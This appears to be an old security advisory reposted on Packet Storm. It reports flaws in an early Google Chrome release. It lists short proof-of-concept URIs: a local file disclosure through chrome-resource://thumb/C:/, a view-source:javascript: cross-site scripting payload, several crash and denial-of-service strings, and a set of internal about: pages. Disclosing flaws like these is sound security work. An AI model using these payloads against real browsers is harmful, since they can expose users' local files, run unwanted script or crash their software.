Google Chrome appears to suffer from denial of service issues through misuse of the view-source URI.
5d990fc777e6b98148174480d63e8c8f7b2e1dc130def54d59a966677b34a49e#######################Google Chrome Inesecure Methods&XSS###########################################
#########By: e.wiZz! ew1zz@hotmail.com najjaci.net
#########Thanks: shinnai(for being so cool) and lot of other friends
In the wild...
######################################################################################################
Chrome suffers from insecure methods thru "view-source" URI scheme(it is just scheme,not protocol).
file disclosure chrome-resource://thumb/C:/
######## XSS:
Sometimes it won't work,dunno reason:
view-source:javascript:alert('dssd');
########Further research:
sometimes browser crashes with:
view-source::::::::
view-source://%00
also possible Dos(or loop) with:
chrome-resource://new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/new-tab/
If you want to study protocols and other thingys,click "Start I/O" and surf a little:
about:network
Other schemes:
about:cache
about:dns
about:histograms
about:objects
about:memory
about:plugins
about:stats <--- note to developer - you aren't funny tho.
about:version
about:crash <--- make something what looks nice plz :)
chrome-resource:
view-cache:
about:internets <--- they aren't working at Google Inc,they are bored i think :)
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed